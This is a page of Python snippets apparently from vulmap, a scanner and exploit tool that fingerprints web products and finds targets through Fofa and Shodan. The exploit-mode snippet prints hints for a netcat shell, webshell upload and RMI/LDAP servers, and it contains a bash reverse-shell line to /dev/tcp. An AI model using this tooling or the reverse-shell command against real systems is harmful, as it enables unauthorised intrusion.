Exemplo n.º 1
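 def scan_print(vul_info):
     """Report the outcome of one PoC check and pass hits to ``output``.

     Reads the ``prt_resu``, ``prt_name``, ``vul_name``, ``vul_type``,
     ``vul_numb`` and ``prt_info`` entries of ``vul_info``. A result of
     ``"PoCSuCCeSS"`` or ``"PoC_MaYbE"`` is printed in green and handed to
     ``output`` twice (the whole record as "json", a one-line summary as
     "text"). Any other result is printed as a miss: on its own line in debug
     mode, as a self-overwriting status line otherwise.

     A record that lacks one of the expected keys is reported through the
     error branch instead of aborting the scan with an unhandled KeyError.
     """
     try:
         delay = globals.get_value("DELAY")  # global DELAY setting
         debug = globals.get_value("DEBUG")  # global DEBUG setting
         result = vul_info["prt_resu"]
         prt_name = vul_info["prt_name"]
         vul_name = vul_info["vul_name"]
         vul_type = vul_info["vul_type"]
         vul_numb = vul_info["vul_numb"]
         info = vul_info["prt_info"]

         # Confirmed and "maybe" findings differ only in the console marker.
         if result == "PoCSuCCeSS":
             marker = "[+] The target is "
         elif result == "PoC_MaYbE":
             marker = "[?] The target maybe "
         else:
             marker = None

         if marker is not None:
             print(now.timed(de=delay) + color.green(marker + prt_name + " " + info))
             # The output module decides whether anything is written to a file.
             output("json", vul_info)
             output("text", "--> [名称:" + vul_name + "] [编号:" + vul_numb + "] [类型:" + vul_type + "] " + info)
         elif debug == "debug":
             print(now.timed(de=delay) + color.magenta("[-] The target no " + color.magenta(prt_name)))
         else:
             # "\r" plus the padded end string lets the next status line overwrite this one.
             print("\r{0}{1}{2}".format(now.timed(de=delay),
                                        color.magenta("[-] The target no "),
                                        color.magenta(prt_name)), end="                           \r", flush=True)
     except (IndexError, KeyError) as error:
         # vul_info is indexed by key, so a malformed record raises KeyError;
         # IndexError is kept for callers that relied on the original handler.
         print(now.timed(de=0) + color.red("[ERROR] " + error.__traceback__.tb_frame.f_globals['__file__']
                                           + " " + str(error.__traceback__.tb_lineno)))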
Exemplo n.º 2
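def fofa(fofa, size):
    """Query the Fofa search API and return the first column of every result row.

    Args:
        fofa: The Fofa search expression; it is base64-encoded before sending.
        size: Value passed as the API's ``size`` parameter.

    Returns:
        A list holding element 0 of each entry in the response's ``results``.

    On a non-200 answer, a timeout, a connection error or any other exception
    a message is printed and the process exits with status 0, as before.
    """
    timeout = globals.get_value("TIMEOUT")  # global TIMEOUT setting
    headers = globals.get_value("HEADERS")  # global HEADERS setting
    email = globals.get_value("fofa_email")
    key = globals.get_value("fofa_key")
    qbase = base64.b64encode(str.encode(fofa)).decode('ascii')
    endpoint = "https://fofa.so/api/v1/search/all"
    # Passing the query through ``params`` percent-encodes it: standard base64
    # can contain "+", "/" and "=", which are not safe to paste into a URL.
    query = {"email": email, "key": key, "size": size, "qbase64": qbase}
    # The console copy of the URL carries a redacted key so the credential
    # does not end up in terminal scrollback or captured logs.
    shown_url = endpoint + "?email={email}&key={key}&size={size}&qbase64={qbase}".format(
        email=email, key="********", size=size, qbase=qbase)
    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa api: " + shown_url))
    try:
        # Certificate verification stays on here: this request carries the API
        # key to a public service, unlike probes against scan targets.
        res = requests.get(endpoint, params=query, headers=headers, timeout=timeout)
        if res.status_code != 200:
            print(now.timed(de=0) + color.red_warn() + color.red(" " + res.text))
            exit(0)
        return [row[0] for row in json.loads(res.text)['results']]
    except requests.exceptions.Timeout:
        print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because of timeout "))
        exit(0)
    except requests.exceptions.ConnectionError:
        print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because the connection failed "))
        exit(0)
    except Exception:
        # Also reached for an unparsable body or a response without "results".
        print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because unknown error "))
        exit(0)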
Exemplo n.º 3
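 def start(url, webapps_identify):
     """Fingerprint ``url`` and record the detected web applications.

     Fetches ``url`` once, then runs every ``Identify`` probe in a fixed order,
     handing each the shared ``webapps_identify`` list. If the list is still
     empty afterwards, "all" is appended so that every PoC is run.

     Args:
         url: Target URL to fingerprint.
         webapps_identify: List that is read here and extended with "all"
             when nothing was identified; the probes receive the same list.
     """
     ua = globals.get_value("UA")  # global User-Agent string
     timeout = globals.get_value("TIMEOUT")  # global TIMEOUT setting
     headers = {'User-Agent': ua}
     try:
         # verify=False: scan targets commonly present self-signed certificates.
         resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
     except Exception:
         # Narrowed from a bare ``except`` so Ctrl-C still interrupts the scan.
         # The probes receive the string "null" when the fetch failed.
         resp = "null"
     identifier = Identify(url)
     identifier.flink(webapps_identify, resp, url)
     identifier.tomcat(webapps_identify, resp, url)
     identifier.fastjson(webapps_identify, url)  # the only probe called without resp
     identifier.elasticsearch(webapps_identify, resp, url)
     identifier.jenkins(webapps_identify, resp, url)
     identifier.weblogic(webapps_identify, resp, url)
     identifier.spring(webapps_identify, resp, url)
     identifier.solr(webapps_identify, resp, url)
     identifier.nexus(webapps_identify, resp, url)
     identifier.jboss(webapps_identify, resp, url)
     identifier.drupal(webapps_identify, resp, url)
     identifier.struts2(webapps_identify, resp, url)
     identifier.shiro(webapps_identify, resp, url)
     identifier.druid(webapps_identify, resp, url)
     identifier.eyou(webapps_identify, resp, url)
     identifier.coremail(webapps_identify, resp, url)
     if webapps_identify:
         for a in webapps_identify:
             print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + a + "          ")))
     else:
         # Nothing matched: fall back to running every PoC.
         webapps_identify.append("all")
         print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs           ")))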
Exemplo n.º 4
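def version_check():
    """Compare the running version with the one published in the GitHub repo.

    The published version is scraped from the rendered ``version`` file page
    with a regular expression, then compared with the global ``VULMAP`` value.
    A message is printed for "up to date", "update available", "unknown
    version" and "check failed"; nothing is returned.
    """
    version = globals.get_value("VULMAP")  # running vulmap version string
    timeout = globals.get_value("TIMEOUT")  # global TIMEOUT setting
    headers = globals.get_value("HEADERS")  # global HEADERS setting
    github_ver_url = "https://github.com/zhzyker/vulmap/blob/main/version"
    now_warn = now.timed(de=0) + color.red_warn()

    def _numeric(text):
        # Compare versions by their integer components: plain string
        # comparison would rank "0.10" below "0.9".
        return tuple(int(part) for part in re.findall(r"\d+", text))

    try:
        github_ver_request = requests.get(url=github_ver_url,
                                          headers=headers,
                                          timeout=timeout)
        version_res = r'blob-code blob-code-inner js-file-line">(.*)</td>'
        found = re.findall(version_res, github_ver_request.text,
                           re.S | re.M)
        if not found:
            # The page markup no longer matches (or an error page came back);
            # report a failed check instead of raising IndexError.
            print(now_warn + color.red(" The current version is: " + version +
                                       ", Version check filed"))
            return
        github_ver = found[0]
        if version == github_ver:
            print(
                now.timed(de=0) + color.yel_info() +
                color.yellow(" Currently the latest version: " + version))
        elif _numeric(version) < _numeric(github_ver):
            print(now_warn + color.red(" The current version is: " + version +
                                       ", Latest version: " + github_ver))
            print(now_warn + color.red(
                " Go to github https://github.com/zhzyker/vulmap update"))
        else:
            print(now_warn + color.red(" Unknown version: " + version))
    except (requests.exceptions.ConnectionError,
            requests.exceptions.Timeout):
        print(now_warn + color.red(" The current version is: " + version +
                                   ", Version check filed"))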
Exemplo n.º 5
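def proxy_set(pr, pr_mode):
    """Route all sockets of the process through the given proxy and report it.

    Args:
        pr: Proxy address in ``host:port`` form.
        pr_mode: Proxy kind; a value containing "socks" selects SOCKS5, one
            containing "http" selects an HTTP proxy.

    A malformed address (no colon, or a port that is not an integer) prints
    the format hint and exits with status 0.
    """
    headers = globals.get_value("HEADERS")  # global HEADERS setting
    proxy_ip, separator, port_text = pr.rpartition(":")
    try:
        if not separator:
            raise ValueError("missing port")
        proxy_port = int(port_text)
    except ValueError:
        # Covers both a missing colon and a non-numeric port; the latter used
        # to escape as an unhandled ValueError.
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " Proxy format error (e.g. --proxy-socks 127.0.0.1:1080)"))
        sys.exit(0)
    if r"socks" in pr_mode:
        socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port)
    elif r"http" in pr_mode:
        socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port)
    # Process-wide monkeypatch: every socket created after this line goes
    # through the socks module, including those opened by other libraries.
    socket.socket = socks.socksocket
    try:
        # NOTE(review): this lookup is plain HTTP to a third-party service and
        # reveals the proxy's exit address to it; the answer is display-only.
        proxy_ip_info = requests.get("http://api.hostip.info/get_json.php",
                                     headers=headers,
                                     timeout=5)
        proxy_ip_info_json = json.loads(proxy_ip_info.text)
        proxy_ip_info_dict = "[region: " + proxy_ip_info_json[
            "country_name"] + "] " + "[city: " + proxy_ip_info_json[
                "city"] + "] " + "[proxy ip: " + proxy_ip_info_json["ip"] + "]"
    except (requests.exceptions.ConnectionError,
            requests.exceptions.Timeout,
            ValueError, KeyError, TypeError):
        # ValueError/KeyError/TypeError: the service answered with something
        # other than the expected JSON object; that must not abort the run.
        proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Use custom proxy: " + pr))
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Proxy info: " + proxy_ip_info_dict))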
Exemplo n.º 6
 def error_print(prt_name):
     """Print the "target is not <prt_name>" miss line.

     In debug mode the line is printed normally; otherwise it is written as a
     status line that returns the cursor to column 0 so the next one
     overwrites it.
     """
     pause = globals.get_value("DELAY")  # global DELAY setting
     verbose = globals.get_value("DEBUG") == "debug"  # global DEBUG setting
     if verbose:
         print(now.timed(de=pause) + color.magenta("[-] The target no " + color.magenta(prt_name)))
         return
     stamp = now.timed(de=pause)
     label = color.magenta("[-] The target no ")
     name = color.magenta(prt_name)
     # The padded end string blanks out leftovers of a longer previous line.
     print("\r{0}{1}{2}".format(stamp, label, name),
           end="                            \r",
           flush=True)
Exemplo n.º 7
 def connection_print(prt_name):
     """Print that the check named ``prt_name`` could not reach the target.

     Debug mode prints a full line with the longer wording; otherwise a short
     self-overwriting status line is written.
     """
     pause = globals.get_value("DELAY")  # global DELAY setting
     verbose = globals.get_value("DEBUG") == "debug"  # global DEBUG setting
     if verbose:
         print(now.timed(de=pause) + color.red_warn() +
               color.cyan(" " + prt_name + " check failed because unable to connect !!!"))
         return
     stamp = now.timed(de=pause)
     badge = color.red_warn()
     text = color.cyan(" " + prt_name + " connection failed !!!")
     # "\r" at both ends keeps the status line on a single, reusable row.
     print("\r{0}{1}{2}".format(stamp, badge, text),
           end="                            \r",
           flush=True)
Exemplo n.º 8
 def exploit_print(request, raw_data):
     """Print the result of an exploit attempt.

     Debug mode prints ``raw_data``. Otherwise ``request`` is printed, unless
     it contains the marker "PoC_WaTinG", in which case a failure notice is
     printed instead.
     """
     pause = globals.get_value("DELAY")  # global DELAY setting
     if globals.get_value("DEBUG") == "debug":  # global DEBUG setting
         print(raw_data)
         return
     # The marker test runs only outside debug mode, as in the original.
     if r"PoC_WaTinG" in request:
         print(now.timed(de=pause) + color.red_warn() + color.magenta(" Command Executed Failed... ..."))
         return
     print(request)
Exemplo n.º 9
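def shodan_api(shodan_keyword):
    """Search Shodan and return the matches as ``"ip:port"`` strings.

    Args:
        shodan_keyword: Query string handed to ``Shodan.search``.

    Returns:
        One ``"ip_str:port"`` string per entry in the response's ``matches``.

    A Shodan API error is printed and the process exits with status 0.
    """
    shodan_key = globals.get_value("shodan_key")
    try:
        api = shodan.Shodan(shodan_key)
        res = api.search(shodan_keyword)
        return ["%s:%s" % (match['ip_str'], match['port']) for match in res['matches']]
    except shodan.APIError as e:
        # The exception class lives on the shodan module; the original looked
        # it up on the key value, so this handler could never match.
        print(now.timed(de=0) + color.red_warn() + color.red(" Shodan api: " + str(e)))
        exit(0)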
Exemplo n.º 10
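 def install_crypto():
     """Offer to install the bundled pycryptodome archive and run its setup.

     After the user answers "y", ``./thirdparty/pycryptodome.tar.gz`` (relative
     to ``pwd_vulmap``) is unpacked into the interpreter's ``purelib``
     directory and ``python3 setup.py install`` is run inside the unpacked
     tree. Success, a failed installation and a permission problem each print
     their own message. Note that the working directory is changed and not
     restored.
     """
     input_crypto = input(
         now.timed(de=0) + color.yel_info() + color.yellow(
             " pycryptodome dependency not found, install it now (y/n): "))
     if input_crypto != "y":
         return
     try:
         pwd_packages = sysconfig.get_paths()["purelib"]
         os.chdir(pwd_vulmap)
         pycryptodome_tar = "./thirdparty/pycryptodome.tar.gz"
         # The archive is unpacked into site-packages, so a member path that
         # escapes the destination would overwrite arbitrary files. Use the
         # interpreter's "data" extraction filter where it exists and fall
         # back to a member-name check otherwise.
         with tarfile.open(pycryptodome_tar) as t:
             if hasattr(tarfile, "data_filter"):
                 t.extractall(path=pwd_packages, filter="data")
             else:
                 dest_root = os.path.realpath(pwd_packages)
                 for member in t.getmembers():
                     member_path = os.path.realpath(
                         os.path.join(dest_root, member.name))
                     if os.path.commonpath([dest_root, member_path]) != dest_root:
                         raise ValueError(
                             "archive member outside destination: " + member.name)
                 # NOTE(review): this fallback checks member names only, not
                 # the targets of link members.
                 t.extractall(path=pwd_packages)
         pwd_crypto = pwd_packages + "/pycryptodome"
         os.chdir(pwd_crypto)
         # os.system reports failure through its return value, not through an
         # exception, so the failure message belongs in the else branch.
         if os.system("python3 setup.py install >> /dev/null 2>&1") == 0:
             print(
                 now.timed(de=0) + color.yel_info() +
                 color.yellow(" pycryptodome install to: " + pwd_packages))
             print(
                 now.timed(de=0) + color.yel_info() + color.yellow(
                     " Crypto dependency installation is complete"))
         else:
             print(
                 now.timed(de=0) + color.red_warn() + color.yellow(
                     " Crypto installation failed, please use \" pip3 install pycryptodome\" to install"
                 ))
     except Exception as error:
         if r"Permission" in str(error):
             print(
                 now.timed(de=0) + color.red_warn() + color.yellow(
                     " Permission denied: Need root privileges or \"sudo xxxx\""
                 ))
         else:
             # Previously every other error ended the function silently.
             print(
                 now.timed(de=0) + color.red_warn() + color.yellow(
                     " Crypto installation failed, please use \" pip3 install pycryptodome\" to install"
                 ))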
Exemplo n.º 11
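def ceye():
    """Fetch the DNS records logged for the configured ceye.io token.

    Returns:
        The raw response body as text. A non-200 status additionally prints
        the body as a warning; the body is returned either way.

    Exceptions raised by ``requests.get`` are not handled here.
    """
    timeout = globals.get_value("TIMEOUT")  # global TIMEOUT setting
    headers = globals.get_value("HEADERS")  # global HEADERS setting
    ceye_token = globals.get_value("ceye_token")
    # NOTE(review): the token travels in the query string of a plain-HTTP
    # request, so it is readable on the network path and in proxy logs.
    # Confirm whether the service offers an HTTPS endpoint before changing it.
    api_url = "http://api.ceye.io/v1/records?type=dns&token=" + ceye_token
    res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
    if res.status_code != 200:
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Ceye.io: " + res.text))
    return res.text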
Exemplo n.º 12
def output(types, item):
    """Forward ``item`` to the text or JSON writer when that output is enabled.

    Args:
        types: "text" or "json"; any other value writes nothing.
        item: Payload handed unchanged to ``output_text`` / ``output_json``.

    The writers are called with the global ``O_TEXT`` / ``O_JSON`` value as
    their first argument, and only when that value is truthy. Any exception is
    reported as an "[ERROR] <file> <line>" message instead of propagating.
    """
    try:
        text_target = globals.get_value("O_TEXT")
        json_target = globals.get_value("O_JSON")
        if types == "text" and text_target:
            output_text(text_target, item)
        elif types == "json" and json_target:
            output_json(json_target, item)
    except Exception as error:
        trace = error.__traceback__
        location = trace.tb_frame.f_globals['__file__'] + " " + str(trace.tb_lineno)
        print(now.timed(de=0) + color.red("[ERROR] " + location))
Exemplo n.º 13
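def dismap(line):
    """Translate one line of a target file that may be a dismap result file.

    Args:
        line: One line of the input file.

    Returns:
        "######" for a line containing "dismap" (which also switches the
        global ``DISMAP`` flag to "true") or containing "######"; while the
        flag is "true", the text between the first "{ " and " }" of the line,
        or None when the line has no such pair; otherwise ``line`` unchanged.
    """
    if "dismap" in line:
        print(
            now.timed(de=0) + color.yel_info() +
            color.green(" The file is dismap Identification results"))
        globals.set_value("DISMAP", "true")
        return "######"
    if "######" in line:
        return "######"
    if globals.get_value("DISMAP") == "true":
        # An explicit no-match test replaces the bare ``except`` that also
        # swallowed KeyboardInterrupt and unrelated errors.
        found = re.search("[{] (.*?) [}]", line)
        return found.group(1) if found else None
    return line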
Exemplo n.º 14
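    def control_options(args):
        """Act on the parsed command-line options and start the requested run.

        Handles, in order: proxy setup, the vulnerability list, thread and
        debug notices, the dnslog availability check, refusal to overwrite an
        existing output file, and finally dispatch to ``core.control_webapps``
        for a single URL, a target file, a Fofa query or a Shodan query (poc
        mode) or for one exploit module (exp mode).

        Args:
            args: The parsed options object; the attributes read are visible
                in the body (``socks``, ``http``, ``list``, ``thread_num``,
                ``vul``, ``debug``, ``O_TEXT``, ``O_JSON``, ``mode``, ``url``,
                ``file``, ``app``, ``fofa``, ``size``, ``shodan``).
        """
        delay = globals.get_value("DELAY")  # global DELAY setting
        now_warn = now.timed(de=delay) + color.red_warn()

        def _redacted(secret):
            # API keys are credentials: echo only a short tail so the operator
            # can tell keys apart without the full value landing in logs.
            secret = str(secret)
            if len(secret) <= 8:
                return "*" * len(secret)
            return "*" * (len(secret) - 4) + secret[-4:]

        if args.socks:
            proxy_set(args.socks, "socks")  # proxy support socks5 http https
        elif args.http:
            proxy_set(args.http, "http")  # proxy support socks5 http https
        # NOTE(review): list and debug trigger on ``is False``; presumably the
        # options are declared store_false - confirm against the parser.
        if args.list is False:  # show the list of supported vulnerabilities
            print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities"))
            print(vul_list())
        if args.thread_num != 10:  # thread count differs from the default
            print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
        if args.vul is not None:  # -v selects an exploit module
            args.mode = "exp"  # exploitation requested: switch mode to exp
        if args.debug is False:  # --debug requested
            print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
            globals.set_value("DEBUG", "debug")  # set the global DEBUG flag
        if not dns_request():  # initialise dnslog and check that it is usable
            print(now_warn + color.red(" Dnslog platform (hyuga.co dnslog.cn ceye.io) is not available"))
        if args.O_TEXT:  # text output requested
            if os.path.isfile(args.O_TEXT):  # refuse to overwrite an existing file
                # The original message called this the json file.
                print(now.timed(de=delay) + color.red_warn() + color.red(" The text file: [" + args.O_TEXT + "] already exists"))
                exit(0)
        if args.O_JSON:  # json output requested
            if os.path.isfile(args.O_JSON):  # refuse to overwrite an existing file
                print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
                exit(0)
        if args.mode is None or args.mode == "poc":  # poc (scan) mode
            if args.url is not None and args.file is None:  # only -u: one URL
                args.url = url_check(args.url)  # normalise the URL
                if survival_check(args.url) == "f":  # target liveness check
                    print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url))
                    exit(0)  # a dead single target ends the run
                print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url))
                if args.app is None:  # no webapp chosen: all PoCs for one URL
                    globals.set_value("RUNALLPOC", True)
                core.control_webapps("url", args.url, args.app, "poc")
            elif args.file is not None and args.url is None:  # only -f: batch file
                if os.path.isfile(args.file):  # the target file must exist
                    print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file))
                else:
                    print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file))
                    exit(0)
                if args.app is None:  # no webapp chosen: all PoCs for a file
                    globals.set_value("RUNALLPOC", "FILE")
                core.control_webapps("file", args.file, args.app, "poc")
            elif args.url is None and args.file is None and args.fofa is not None:  # Fofa API
                print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning"))
                if r"xxxxxx" in globals.get_value("fofa_key"):  # placeholder key still configured
                    print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap"))
                    exit(0)
                else:
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email")))
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + _redacted(globals.get_value("fofa_key"))))
                fofa_list = fofa(args.fofa, args.size)  # target list from the Fofa API
                core.control_webapps("fofa", fofa_list, args.app, "poc")

            elif args.url is None and args.file is None and args.shodan is not None:  # Shodan API
                print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning"))
                if r"xxxxxx" in globals.get_value("shodan_key"):  # placeholder key still configured
                    print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap"))
                    exit(0)
                else:
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + _redacted(globals.get_value("shodan_key"))))
                shodan_list = shodan_api(args.shodan)  # target list from the Shodan API
                core.control_webapps("shodan", shodan_list, args.app, "poc")

            if args.O_TEXT:
                print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
            if args.O_JSON:
                print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
        elif args.mode == "exp":  # exploit mode takes fewer options
            if args.vul is not None and args.url is not None:  # -v needs -u
                core.control_webapps("url", args.url, args.vul, "exp")
            else:
                print(now_warn + color.red(" Options error, -v must specify -u"))
        else:
            print(now_warn + color.red(" Options error ... ..."))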
Exemplo n.º 15
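 def control_webapps(target_type, target, webapps, mode):
     """Run the scan (or one exploit module) against the given target(s).

     Args:
         target_type: "url", "file", "fofa" or "shodan".
         target: A URL, the path of a target file, or a list of targets from
             the Fofa / Shodan API, matching ``target_type``.
         webapps: None (fingerprint each target first), a collection that
             contains "all" (run every PoC), or the webapp names to scan.
             In "exp" mode this is the exploit module identifier.
         mode: "poc" to scan, "exp" to hand over to ``exploit``.
     """
     t_num = globals.get_value("THREADNUM")  # number of worker threads
     thread_poc = []  # thread tasks submitted by the scan
     gevent_pool = []  # greenlet tasks submitted by the scan
     thread_pool = ThreadPoolExecutor(t_num)  # pool size comes from the options
     webapps_identify = []  # webapps detected or selected for the current target

     def _announce_selection(selected):
         # Prints the chosen webapps on one line, newline after the last one.
         print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='')
         for w_i in selected:
             print(color.cyan(w_i), end=' ')
         if selected:
             print(end='\n')

     if mode == "poc":  # vulnerability scan mode
         if target_type == "url":  # case 1: a single URL
             output("text", "[*] " + target)  # output decides whether a file is written
             if webapps is None:  # no selection: fingerprint the target
                 Identify.start(target, webapps_identify)
             elif r"all" in webapps:  # run every PoC without fingerprinting
                 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities"))
                 webapps_identify.append("all")
             else:
                 webapps_identify = webapps  # explicit selection, e.g. -a solr struts2
                 _announce_selection(webapps_identify)
             core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target)
             joinall(gevent_pool)  # run the greenlets
             wait(thread_poc, return_when=ALL_COMPLETED)  # wait for all thread tasks
             print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended                             "))
         elif target_type == "file":  # case 2: batch scan of a target file
             # One pass with a context manager replaces three separate reads,
             # two of which never closed the file and one of which used the
             # 'rU' mode that Python 3.11 removed.
             with open(target, 'r') as handle:
                 target_list = [entry.strip() for entry in handle if entry.strip()]
             target_num = len(target_list)  # blank lines are not counted
             now_num = 0  # index of the current target
             for line in target_list:
                 now_num += 1
                 furl = url_check(line)  # normalise the URL
                 output("text", "[*] " + furl)  # output decides whether a file is written
                 if survival_check(furl) == "f":  # skip targets that are down
                     print(now.timed(de=0) + color.red_warn() + color.red(
                         " Current:[" + str(now_num) + "] Total:[" + str(
                             target_num) + "] Survival check failed: " + furl))
                     continue
                 else:
                     print(now.timed(de=0) + color.yel_info() + color.yellow(
                         " Current:[" + str(now_num) + "] Total:[" + str(
                             target_num) + "] Scanning target: " + furl))
                 if webapps is None:  # no selection: fingerprint this target
                     webapps_identify.clear()  # drop the previous target's result
                     Identify.start(furl, webapps_identify)
                 elif r"all" in webapps:  # run every PoC without fingerprinting
                     print(now.timed(de=0) + color.yel_info() + color.yellow(
                         " Specify to scan all vulnerabilities"))
                     webapps_identify.append("all")
                 else:
                     webapps_identify = webapps
                     _announce_selection(webapps_identify)
                 core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, furl)
                 joinall(gevent_pool)  # run the greenlets
                 wait(thread_poc, return_when=ALL_COMPLETED)  # wait for all thread tasks
             print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended                             "))
         elif target_type == "fofa" or target_type == "shodan":  # case 3: API result list
             total = len(target)  # number of targets returned by the API
             if webapps is not None:
                 if r"all" in webapps:  # run every PoC without fingerprinting
                     print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities"))
                     webapps_identify.append("all")
                 else:
                     webapps_identify = webapps  # explicit selection
                     _announce_selection(webapps_identify)
             now_num = 0  # index of the current target
             for f_target in target:
                 fofa_target = url_check(f_target)
                 output("text", "[*] " + fofa_target)  # output decides whether a file is written
                 now_num += 1
                 if survival_check(fofa_target) == "f":
                     print(now.timed(de=0) + color.red_warn() + color.red(
                         " Current:[" + str(now_num) + "] Total:[" + str(
                             total) + "] Survival check failed: " + fofa_target))
                     continue
                 else:
                     print(now.timed(de=0) + color.yel_info() + color.yellow(
                         " Current:[" + str(now_num) + "] Total:[" + str(
                             total) + "] Scanning target: " + fofa_target))
                 if webapps is None:  # no selection: fingerprint this target
                     # Fingerprint the current URL, not the whole result list,
                     # and start from an empty list as the file branch does.
                     webapps_identify.clear()
                     Identify.start(fofa_target, webapps_identify)
                 core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, fofa_target)
                 joinall(gevent_pool)  # run the greenlets
                 wait(thread_poc, return_when=ALL_COMPLETED)  # wait for all thread tasks
             print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended                             "))
     elif mode == "exp":  # exploit mode
         vul_num = webapps
         exploit(target, vul_num)  # hand over to the exploit dispatcher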
Exemplo n.º 16
def exploit(target, vul_num):
    """Run an interactive prompt loop for the module selected by *vul_num*.

    The target is normalised with ``url_check`` and the process exits when
    ``survival_check`` returns ``"f"``.  One helper object per supported
    product is then constructed for the target, *vul_num* is checked against
    ``explists``, and each line typed by the operator is forwarded to the
    matching ``*_exp`` method until ``exit``, ``quit`` or ``bye`` is entered.

    Args:
        target: Target URL as supplied by the caller; rebound to whatever
            ``url_check`` returns.
        vul_num: Identifier of the module to drive (a CVE id, an ``S2-xxx``
            id or a fastjson version string).  It must be in ``explists``.

    As shown, every branch either loops on ``input()`` or terminates the
    process; all exit paths, including the two failure paths, use status 0,
    so a wrapper script cannot tell failure from a normal quit by exit code.
    """
    target = url_check(target)
    if survival_check(target) == "f":
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Survival check failed: " + target))
        # NOTE(review): this uses the `exit` builtin while other paths below
        # use sys.exit(); both raise SystemExit, but the mix is inconsistent.
        exit(0)
    delay = globals.get_value("DELAY")  # read the global DELAY setting
    # One helper per product family is built up front, whichever vul_num was
    # requested.  Whether the constructors touch the network is not visible
    # here -- TODO confirm against the class definitions.
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Target url: " + target))
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Use exploit modules: " + vul_num))
    # Pre-rendered hint lines; only nc, up and rmi_ldap are printed further
    # down.  `bash` is built but not referenced again in this function.
    nc = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
        " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    # Author's note on the six defaults below: they exist only to silence
    # PyCharm's "may be referenced before assignment" warning.
    # NOTE(review): the prompts below are if/elif on os_check() with no else,
    # so if os_check() returned anything other than "linux", "other" or
    # "windows" these defaults are what would be passed to the module.
    cmd = "whoami"  # placeholder to silence the PyCharm warning
    file = "/etc/passwd"  # placeholder to silence the PyCharm warning
    shiro_key = "1"  # placeholder to silence the PyCharm warning
    shiro_gadget = "1"  # placeholder to silence the PyCharm warning
    nexus_u = "admin"  # placeholder to silence the PyCharm warning
    nexus_p = "admin"  # placeholder to silence the PyCharm warning

    # Reject ids that have no interactive module; note the status is still 0.
    if vul_num not in explists:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
